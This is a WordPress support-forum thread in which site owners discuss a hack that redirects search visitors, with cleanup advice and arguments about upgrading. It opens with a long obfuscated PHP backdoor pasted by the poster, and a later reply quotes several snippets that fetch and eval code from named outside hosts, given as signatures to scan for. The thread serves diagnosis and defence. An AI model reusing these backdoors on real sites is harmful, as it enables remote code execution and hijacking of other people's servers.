    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/"",/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/strrev($trp_m[1])/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/);/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/$trp_f();/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/ ?>

    How can I block this hacking attemps? I don’t know how the hacker add these code to an image and, of course, to my MySQL database to get out the visitors arriving from google out from my website.

Viewing 15 replies - 16 through 30 (of 41 total)
  • My site was hacked this week also and is redirecting. I have tried everything recommended and still no fix. Replaced plugins, deactivated them, deleted the string in wp-options, etc. This is getting really outrageous that WP is not fixing this!

    It’s outrageous that you would post at the bottom of this extensive thread, where helpful advice was given, but apparently unheeded by at least you:

    If you want a secure site, than you have to stay up on the upgrades, you have to make sure that you upgrade properly, you have to keep up on plugin upgrades, you have to have be mindful of file and directory permissions, etc.

    And once compromised, the files should be wiped and replaced, the passwords should all be changed, the secret key should be changed, and the database should be scoured for anything malicious.

    Bottom line, UPGRADE or suffer the consequences. It’s just that simple. WP is not to blame. Hackers are to blame. Be responsible for your site, your web space. Upgrade when security patches are released.

    My WP has been upgraded to 2.5.1 since it was released….so wanna try again???

    Then you were hacked BEFORE you upgraded and since you likely did not wipe and replace the hacked files, they carried over into your upgrade.

    Wanna try again?

    Nope…I can see from my traffic when I was hacked. It is pretty easy to see when I had a drop of over 1000 people a day and it was last week….long after my upgrade to 2.5.1.

    Oh lookie…I restored files to what they were before last week…looooong after upgrade to latest WP version and hack is gone. Yes, folks this hack affects 2.5.1 too. BIG security hole somewhere.

    i am coming across so many google results that a redirected due to the hack.

    the silence from the wordpress team is deafening.

    this hack has to affect thousands of blogs.

    incredible.

    whooami

    @whooami

    Member

    the silence from the wordpress team is deafening.

    Nice cliche, “Bob”. Where, pre tel, would you like to “hear” them? Devs dont post here – as a rule.

    Anyone with something useful to present to the devs that is evidence of there being something insecure in 2.5.1 is encouraged to send an e-mail to security@wordpress.org

    Whoami:

    Are you familiar with a solution to this? Is there a fix which will prevent the blogs from getting re-hacked?

    Best Regards,
    Andre

    A few things you need to do if hacked:
    1. Upgrade to the latest version of WP.
    2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
    3. Change your passwords after upgrading and make sure the hacker didn’t create another user.

    Those are VERY dangerous:

    Make sure you scan ALL your files for following words in your code:

    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);}
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    eval(gzinflate(base64_decode(

    words:

    k1b0rg in any of your files.

    Once found clean it up!

    If you have broken fingers and want someone to clean it up for you – ring me a bell : icq 119655677

    hey and dont forget to send nice abuse emails to ISP of those guys:

    km20725.keymachine.de
    beliy.us
    seogoogle.us

    You can find what patrickdappollonio suggests in my video:
    http://it.youtube.com/watch?v=Obqa6jDV-WQ

    I hope it can help you 🙂

    tried what was suggested in the tutorial. didn’t work.

    I tried all that was suggested too and it did not work. It was not until I copied over the files in the main WP folder (not the directory folders) that the issue went away. I used clean files and now the hack is gone.

    yeah tijja i tried who you suggested and it seems to work on some blogs or but does not work on other for some reason …?

    just to make sure just copy over everything but the wp admin, content and includes folders right?

Viewing 15 replies - 16 through 30 (of 41 total)
  • The topic ‘[Resolved] I was hacked’ is closed to new replies.
Skip to toolbar